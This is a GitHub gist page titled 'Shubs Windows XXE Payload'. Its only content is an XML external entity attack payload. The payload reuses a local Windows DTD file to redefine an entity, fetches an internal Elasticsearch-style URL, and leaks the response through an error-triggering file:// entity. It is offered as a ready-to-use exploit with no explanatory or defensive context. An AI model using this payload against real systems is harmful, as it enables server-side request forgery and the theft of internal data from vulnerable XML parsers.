Created
July 27, 2023 19:18
-
-
Save Rhynorater/d0d19f757221a916a22476c3a5c6aba2 to your computer and use it in GitHub Desktop.
Shubs Windows XXE Payload
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE doc [ | |
<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> | |
<!ENTITY % SuperClass '> | |
<!ENTITY % file SYSTEM "http://example.com:9200/_cat/indices"> | |
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file://test/#%file;'>"> | |
%eval; | |
%error; | |
<!ENTITY test "test"' | |
> | |
%local_dtd; | |
]><xxx>cacat</xxx> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment